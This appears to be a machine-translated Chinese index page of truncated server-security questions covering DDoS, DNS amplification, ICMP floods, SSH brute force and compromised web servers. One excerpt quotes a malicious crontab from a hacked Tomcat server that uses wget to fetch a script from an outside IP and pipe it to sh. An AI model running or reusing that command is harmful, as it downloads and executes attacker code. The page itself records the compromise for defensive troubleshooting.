根据 Internet Storm Center,似乎有一个SSH零日攻击. 这里有一些概念代码证明和一些参考: > http://secer.org/hacktools/0day-openssh-remote-exploit.html > http://isc.sans.org/diary.html?storyid=6742 这似乎是一个严重的问题,因此每个Linux / Unix系统管理员都应
当我进入“6.4.通过SSH隧道化NFS”部分时,我正在懒散地阅读 http://nfs.sourceforge.net/nfs-howto/ar01s06.html,试图理解为什么localhost导出很糟糕.该部分中的所有内容都是关于导出localhost的可能的安全漏洞,因为它允许其他人将ssh端口转发并访问共享. 这是我的问题,如果用户可以连接到可以连接到NFS服务器的计算机,那么如何使s
我们的一个半忙邮件服务器(sendmail)在过去几天内发出了很多来自发出垃圾命令的主机的入站连接. 在过去的两天里: >来自39,000个唯一IP的无效命令的传入smtp连接 > IP来自世界各地不同的范围,而不仅仅是我可以阻止的几个网络 >邮件服务器为整个北美地区的用户提供服务,因此我不能阻止来自未知IP的连接 >示例错误命令:http://pastebin.com/4QUsaTXT 除了烦我
Amplified反射攻击这个词对我来说是新的,我有几个问题. 我听说它主要发生在DNS服务器上 – 这是真的吗? 你如何防范它? 你怎么知道你的服务器是否可以用于这种攻击 – 这是一个配置问题吗? 首先,这种攻击并非(主要)针对DNS本身,如标题所示.它当然会在DNS服务器上创建一些额外的负载,但主要目的是为其他人提供DDoS.糟糕的服务器配置可能会使情况变得更糟,但最终这个问题在DNS和UDP
在Apache tomcat服务器上运行项目战争时,我发现服务器已被入侵. 虽然在一个未知的cron上运行战争就像这样运行 [root@App2 tmp]# crontab -l -u tomcat
*/11 * * * * wget -O - -q http://91.230.47.40/pics/logo.jpg|sh
*/12 * * * * curl http://91.230.47.40
我想每个DROP超过200个请求以防止ddos攻击.这是我用来检测每个ip请求数的命令: netstat -alpn | grep :80 | awk '{print $5}' |awk -F: '{print $(NF-1)}' |sort | uniq -c | sort -nr 现在我想将所有超过200个请求的IP地址添加到IPROP到DROP输入和输出. 您还可以使用iptables来限制
我们遭受了严重的洪水袭击. Tcpdump显示以下结果.尽管我们已经使用iptables阻止了ICMP,但tcpdump仍会打印icmp数据包.我还附上了iptables配置和“top”结果.有什么办法可以完全阻止icmp数据包吗? [root@server downloads]# tcpdump icmp -v -n -nn
tcpdump: listening on eth0, link-ty
我被警告我的服务器打破了转移限制.我认为我的Tor节点变得流行,所以我选择在本月禁用它(不是社区的最佳选择,但我需要关闭).然后我注意到服务器今晚转移了大约4GB.我用Awstats检查了Apache日志,没有相关流量(我没有在那里托管这么受欢迎的网站).我检查了邮件日志,没有人试图发送垃圾.我检查了消息日志,发现了大量的这些 Apr 29 10:17:53 marcus sshd[9281]:
我的网站遭到攻击,并且正在耗尽所有内存.我查看了Apache日志,每次恶意攻击似乎只是/上的POST请求,这是普通用户永远不需要的. 所以我想,并想知道是否有任何类型的解决方案或实用程序将监视我的Apache日志并阻止在站点根目录上执行POST请求的每个IP.我不熟悉DDoS保护,搜索似乎没有给我答案,所以我来到这里. 谢谢. 示例日志: 103.3.221.202 - - [30/Sep/201
我一直致力于构建一个规则集来检测和阻止DNS放大攻击. 我卡住了,希望能在这里找到帮助. 我将在这里发布我的内容(bash脚本,与DNS有关的部分): IPTABLES='/sbin/iptables -v'
SERVERIP=a.b.c.d
echo '################ Previously initiated and accepted exchanges bypass ru
我照看的其中一台服务器似乎正在参与针对Wordpress安装的暴力攻击. 我已经多次接受这个了,所以我非常熟悉可以采取的防止这种情况的步骤.然而,我正在努力的是检测传出的攻击.服务器是一个典型的Apache服务器,上面有许多虚拟主机 – 当然这就是复杂的地方 – 如果那里只有一个,那就不会那么困难了! 我正在使用tcpflow使用此命令记录从此服务器上的任何端口到任何其他计算机上的端口80的流量:
我刚读这篇文章: http://www.infoworld.com/d/security/stop-pass-the-hash-attacks-they-begin-167997?page=0,2&source=IFWNLE_nlt_daily_2011-07-26 他谈到了传递哈希攻击以及操作系统的安全性.它还包括有关如何降低Windows风险而不是Linux风险的提示.我能想到的最佳解决方案是
在一个远程盒子里,我的文件是700-chmoded,但我担心root可能正在阅读它们. 有没有办法添加另一层保护来避免这种情况,可能是通过加密它们,但是当我运行的程序请求它们时允许平滑的即时解密? 我的典型用法是运行irssi和vim的GNU屏幕会话. 谢谢! 从逻辑上思考它 – 不涉及任何特定技术 – 如果它不是你的机器而你不信任root那么你有问题. 你真的无法做任何关于屏幕和irssi的保护
我们的一个网络项目被黑了. Malefactor改变了项目中的一些模板文件和web框架的1个核心文件(它是着名的php框架之一). 我们通过git找到了所有损坏的文件并将它们还原.所以现在我需要找到弱点. 很可能我们可以说,这不是ftp或ssh密码绑定.托管提供商的支持专家(在日志分析之后)说这是我们代码中的安全漏洞. 我的问题: 1)我应该使用哪些工具来查看Apache的访问和错误日志? (
参见英文答案 > I am under DDoS. What can I do? 4个 我最近遭受了一次非常小的攻击,大约70MBPS,但导致TONS上传……所有迹象都指向ICMP.我在防火墙中意识到我在CentOS上运行了CSF防火墙,我对我的传出ICMP速率没有限制…… Woops. :P 还有什么我应该阻止的吗?我们主要是
我认为我们的服务器遭到了一些攻击,因为我们的服务器现在每天都会停机.我想监视导致服务器出现故障的原因,或者某个站点是否有任何攻击或者其爬虫是否正在进行攻击. 这有什么工具吗?如果没有,我该怎么做才能找出导致问题的原因. 编辑 >我的服务器是linux >我有cpanel控制面板 >我没有检查日志 >我没有做任何事情来看看导致问题的原因 >那是 为什么我来这里问我怎么能找到 是什么导致了这个问题.
通过向它们写伪造数据来阻止通过其命名管道攻击Postfix的原因是什么?我在我的系统上看到他们允许对其他人进行写访问.我想知道是否会打开Postfix到DoS或其他形式的攻击. prw--w--w- 1 postfix postdrop 0 Nov 28 21:13 /var/spool/postfix/public/pickup prw--w--w- 1 postfix postdrop 0 N
尝试将一个非常大的文件夹(450G)备份到2TB驱动器时,该服务器仅作为备份目标rdiff-backup(版本1.2.8 – 最后标记为稳定),导致内核崩溃. 系统: Linux giorgio 3.2.0-4-amd64 #1 SMP Debian 3.2.51-1 x86_64 GNU/Linux 磁盘:2个1TB磁盘,采用软件镜像RAID模式,1个2TB磁盘,仅用于备份. 我有一个怀疑:服务
CentOS使用yum更新Exim. Exim配置为不允许使用local_interfaces配置选项进行远程连接. 我的旧版本是4.63-5.el5_5.2并在使用后: yum update exim 它显示:4.63-5.el5_6.2.我想知道这个更新版本是否包含最近的远程攻击(CVE-2011-1764 2011年5月6日发现)修复? DKIM在4.70中添加.除非RedHat向后移植,否
shell脚本自动加黑恶意攻击IP 系统环境:Centos 6.5 X64 如果我们对所有用户开放了SSH 22端口,那么我们就可以在/var/log/secure文件里查看,这里面全是恶意攻击的IP ,那么我们又该如何拒绝这些IP在下次攻击时直接把他拉黑,封掉呢? 或者这个IP再试图登陆4次或7次我就把他拒绝了,把他这个IP永久的封掉呢?这个时候我们就可以用这下面这个脚本来实现。 [root@h
